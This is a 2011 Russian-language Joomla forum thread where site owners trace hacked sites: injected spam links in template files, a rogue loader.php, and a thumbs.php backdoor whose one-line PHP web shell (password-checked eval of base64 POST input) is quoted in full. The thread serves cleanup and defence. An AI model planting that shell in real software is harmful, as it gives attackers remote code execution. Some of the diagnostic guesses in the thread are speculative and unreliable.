0 Пользователей и 1 Гость просматривают эту тему.
  • 38 Ответов
  • 9037 Просмотров
*

argon06

  • Захожу иногда
  • 50
  • 2 / 0
Подозрение на заражение
« : 03.03.2011, 16:38:08 »
Случайно в браузере после ног увидел лишний текст, просмотр через гугло бот подтвердили опасения
Код
</div>
</div> <!-- //FOOTER -->
</div>

<!--cacheb--><p><a href="http://profilsup.fr/" title="generique viagra discount">generique viagra discount</a> | </p><!--cachee-->
</body>
</html>

перерыл весь шаблон (ja_purity_ii) и нашел в папке  layouts в файлах    
  • default-joomla.php
  • default.php
  • handheld.php
  • iphone.php
  • left-main-right.round.php
  • left-main-right.square.php
  • left-right-main.round.php
  • left-right-main.square.php
  • main-right-left.round.php
в самом низу нашлась строчка:
Код
<!--cacheb--><?php if (defined('JOOMLA_CACHE')) { echo JOOMLA_CACHE; } ?><!--cachee-->
Знающие люди, подскажите откуда берется эта реклама и как почистить кроме того что бы удалить эту строку из всех файлов!
Буквально месяц назад на сайте был iframe-вирус, излечился и пароли все сменил, а сейчас снова такое!

*

askona

  • Захожу иногда
  • 98
  • 2 / 0
Re: Подозрение на заражение
« Ответ #1 : 09.03.2011, 19:55:50 »
Такая же фигня . Причем код из шаблона удаляешь, меняешь все пароли  иопять он появляется через день. Подскажите как от этого избавиться. FTP пароль сменил, после смены вообще не заходил по FTP а код все равно появился. Помогите пожалуйста.
*

wishlight

  • Живу я здесь
  • 4855
  • 284 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Подозрение на заражение
« Ответ #2 : 09.03.2011, 20:34:10 »
Скорее всего ломают через какое то уязвимое расширение или залит шелл который вы не убрали.
*

askona

  • Захожу иногда
  • 98
  • 2 / 0
Re: Подозрение на заражение
« Ответ #3 : 09.03.2011, 21:17:11 »
Скорее всего ломают через какое то уязвимое расширение или залит шелл который вы не убрали.
А как его найти? Помимо этого прописывается в папках tmp cache и images/stories файл thumbs.php
в котором вот такой код:
<?php if(md5($_POST["password"])=="42554769b6d9a25f116f0ca87f66c85a"){eval(base64_decode($_POST["code"]));} ?>   больше пока ничего не нашел. Взлом был 2 марта 2011 года
*

argon06

  • Захожу иногда
  • 50
  • 2 / 0
Re: Подозрение на заражение
« Ответ #4 : 11.03.2011, 15:33:55 »
thumbs.php- удаляй везде где найдешь, потом если старая версия нужно обязательно обновиться до последней (у меня была 1.5.12)
еще посмотри сайт на наличие файлика processor.jpg, особенно в папках от модулей/компонентов и т.д. так же рядом с эти файлом может быть еще с примерным названием link.*.db (точно не помню название), проверяй папки с название tmp вся дрянь как правило там.
И еще построчно посмотри код index.php в твоем шаблоне, у меня где то в середине был include на processor.jpg, так же стоит обратить внимание на footer.php
*

askona

  • Захожу иногда
  • 98
  • 2 / 0
Re: Подозрение на заражение
« Ответ #5 : 12.03.2011, 09:09:54 »
спасибо, посмотрю.
*

argon06

  • Захожу иногда
  • 50
  • 2 / 0
Re: Подозрение на заражение
« Ответ #6 : 14.03.2011, 13:32:40 »
ну и еще совет, который дают везде - почаще делать бэкапы
*

pavel55

  • Осваиваюсь на форуме
  • 30
  • 2 / 0
Re: Подозрение на заражение
« Ответ #7 : 29.03.2011, 17:09:17 »
У меня такая же беда: http://joomlaforum.ru/index.php?topic=157547.new;topicseen#new

Удалил как написано выше все, но все равно на сайте генерируется скрытый текст.  Где этот вирус сидит так и не разобрался.  Может кто подскажет, на что ещё можно обратить внимание?
*

busik

  • Захожу иногда
  • 191
  • 7 / 0
Время модификации файлов смотрели?
« Ответ #8 : 29.03.2011, 17:12:48 »
В принципе у всех оно приблизительно одинаковое, если у каких-то сильно отличается - смотрите их внимательно. У меня несколько раз врезали код вверху, один раз внизу. И еще один раз модифицировали не .php файлы, а index.html, который в Жумле почти в каждой папке
*

argon06

  • Захожу иногда
  • 50
  • 2 / 0
Re: Подозрение на заражение
« Ответ #9 : 30.03.2011, 14:20:25 »
и как правило вся эта дрянь идет из временных папок компонентов и модулей, стоит внимательно проверить их
*

svoloth

  • Новичок
  • 7
  • 0 / 0
Re: Подозрение на заражение
« Ответ #10 : 04.04.2011, 13:09:37 »
удали libraries/joomla/loader.php и заблокируй IP  который найдеш  в loader.php (78.159.101.232).
*

pavel55

  • Осваиваюсь на форуме
  • 30
  • 2 / 0
Re: Подозрение на заражение
« Ответ #11 : 04.04.2011, 13:36:58 »
удали libraries/joomla/loader.php и заблокируй IP  который найдеш  в loader.php (78.159.101.232).

Спасибо, удалил! Наверное глупый вопрос, но как этот IP заблокировать? У хостера просить?
*

pavel55

  • Осваиваюсь на форуме
  • 30
  • 2 / 0
Re: Подозрение на заражение
« Ответ #12 : 04.04.2011, 14:05:08 »
Хостер посоветовал так сделать:
Цитировать
Добавьте в файл .htaccess, который находится в корне Вашего сайта:
deny from 78.159.101.232
Этой записью Вы запретите доступ к Вашему сайту с этого IP-адреса.
*

svoloth

  • Новичок
  • 7
  • 0 / 0
Re: Подозрение на заражение
« Ответ #13 : 04.04.2011, 15:21:35 »
Хостер посоветовал правильно  ^-^
*

fatseo

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Подозрение на заражение
« Ответ #14 : 04.04.2011, 19:15:32 »
Народ, на всех своих сайтах обнаружил подобный взлом.
Joomla 1.5.22.
Походу это массовая атака, и используется для простановки seo ссылок - что кстати может загнать ваш сайт в бан Яндекса.

Где-то уязвимость через которую залит шелл.
Блокируя IP и удаляя файлы - уязвимость остается всё равно.

Кому-нибудь удалось её найти?
*

Antik_26

  • Осваиваюсь на форуме
  • 33
  • 1 / 0
Re: Подозрение на заражение
« Ответ #15 : 30.04.2011, 17:39:11 »
Тоже имею данную проблему. Как бороться?
*

busik

  • Захожу иногда
  • 191
  • 7 / 0
Re: Подозрение на заражение
« Ответ #16 : 02.05.2011, 22:01:40 »
Хостер посоветовал правильно  ^-^

Я так с дури в свое время роботов Яндексовских запретил :)
*

voland

  • Легенда
  • 11004
  • 585 / 111
  • Эта строка съедает место на вашем мониторе
Re: Подозрение на заражение
« Ответ #17 : 03.05.2011, 00:35:48 »
У кого есть такая проблема..
И ЕСТЬ логи доступа за период когда она появилась - ссылку на архив с логами в личку, посмотрю.
При отсутсвии логов за нужный период - не писать.
*

svoloth

  • Новичок
  • 7
  • 0 / 0
Re: Подозрение на заражение
« Ответ #18 : 03.05.2011, 10:06:07 »
в логах ничего нет, смотрел HTTP и FTP
*

EDO

  • Новичок
  • 5
  • 0 / 0
Re: Подозрение на заражение
« Ответ #19 : 08.05.2011, 20:18:22 »
Вот и моё время пришло ))))
Всем привет. Нашёл следующее по теме:
http://help.yandex.ru/webmaster/?id=1116584

И кон у себя такой нашёл в файле, которого не должно быть \libraries\joomla\loader.php -  удалил. Всего было два, оставил один.

to argon06: Спаибо, нашёл 4 thumbs.php и удалил с похожим на <?php if(md5($_POST["password"])=="42554769b6d9a25f116f0ca87f66c85a"){eval(base64_decode($_POST["code"]));} ?> кодом.

Ищу дальше. После чистки нужно обновлять. Пока только не совсем понятно, на сайте не нашёл переходного файла с 1.5.12 до последней, попробую 1.5.1_ закинуть.

Далее:
Ктото пытаеться ломать и ломать...
Есть интересный файлик error_log рекомендую глянуть. Там много интересного связанного с файлом \libraries\joomla\loader.php

Спустя несколько часов:
Обновил, почистил и SEF404 выдал следующее, спустя минут 30 после перезаливки
Статус Безопасности: May-2011 [Обновить] (2011-05-09 01:00:58)
Насчитано атак   45    0.2 /h
Слишком много запросов (флуд)   45   100.0 % | 000.2 /h
===
Я так понимаю, что это группа людей с серверами.
В инете всё больше и больше инфы про аналогичные случаи.
Но решения пока нету :) Есть только меры предосторожности...
Видимо ктото хочет добить Joomla.
Глянем логи.. ничего необычного...

Будем следить и дальше...
« Последнее редактирование: 09.05.2011, 01:45:57 от EDO »
*

svoloth

  • Новичок
  • 7
  • 0 / 0
Re: Подозрение на заражение
« Ответ #20 : 09.05.2011, 12:25:38 »
переместил configuration.php  в другое место, ссылки невыводится, но код вставлают
*

EDO

  • Новичок
  • 5
  • 0 / 0
Re: Подозрение на заражение
« Ответ #21 : 09.05.2011, 14:27:31 »
to svoloth: configuration.php с каким доступом? 0444?

Ещё я снёс Authentication - OpenID, Authentication - GMail и Authentication - LDAP.
Они не активны по умолчанию, но возможно это тоже дыры...
Гдето в логах обращение к OpenID проскакивало..
*

svoloth

  • Новичок
  • 7
  • 0 / 0
Re: Подозрение на заражение
« Ответ #22 : 09.05.2011, 19:09:05 »
Цитировать
configuration.php с каким доступом? 0444?
644
*

EDO

  • Новичок
  • 5
  • 0 / 0
Re: Подозрение на заражение
« Ответ #23 : 09.05.2011, 23:20:34 »
644
Я попробовал поставить 0444 на configuration.php, .htaccess, index.php (тот, что в templates).
Это ко всему вышеописанному.
*

EDO

  • Новичок
  • 5
  • 0 / 0
Re: Подозрение на заражение
« Ответ #24 : 04.06.2011, 11:22:29 »
Ну вот... Прошло почти месяц со дня чистки и некоторых (выше-описанных) манипуляций.
Новых атак пока не наблюдается.
Думаю, что дыры всё-таки тут: Authentication - OpenID, Authentication - GMail и Authentication - LDAP.
*

SmokerMan

  • Гуру
  • 5293
  • 720 / 26
Re: Подозрение на заражение
« Ответ #25 : 06.06.2011, 11:39:33 »
Думаю, что дыры всё-таки тут: Authentication - OpenID, Authentication - GMail и Authentication - LDAP.
нету там никаких дыр.
*

voland

  • Легенда
  • 11004
  • 585 / 111
  • Эта строка съедает место на вашем мониторе
Re: Подозрение на заражение
« Ответ #26 : 09.06.2011, 22:28:36 »
Опять попался..
логи пустые, время одно
Остается 2 варианта - кража фтп-доступа (хотя клиент до этого сидит на маке...) либо дыра у хостера.
Очередной клиент на infobox`е но саппорт не дает фтп-логи напрямую (через клиента итп... короче гемор, но отписал)
*

voland

  • Легенда
  • 11004
  • 585 / 111
  • Эта строка съедает место на вашем мониторе
Re: Подозрение на заражение
« Ответ #27 : 10.06.2011, 00:17:00 »
Написал быстренько скриптик удалять всю эту пакость
Если скрипт помог - можете донейтить на ЯД 41001251003183 или R545653827015 или Z267652009871
*

busik

  • Захожу иногда
  • 191
  • 7 / 0
Re: Подозрение на заражение
« Ответ #28 : 10.06.2011, 23:57:03 »
Опять нашел на сайте вирусняк (троян), подсаженыей 28 мая (уж не знаю в какой раз). Задумался о дырах у провайдера ...
*

wishlight

  • Живу я здесь
  • 4855
  • 284 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Подозрение на заражение
« Ответ #29 : 11.06.2011, 10:48:01 »
Вы бы сайт показали. И список расширений и логи.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Подозрение на взлом сайта

Автор Krec

Ответов: 7
Просмотров: 2296
Последний ответ 11.08.2012, 00:39:09
от Krec
Только один сервис выдает подозрение на вирус, для других - сайт чист.

Автор asgeorgith

Ответов: 12
Просмотров: 3374
Последний ответ 16.11.2011, 19:36:33
от vegushka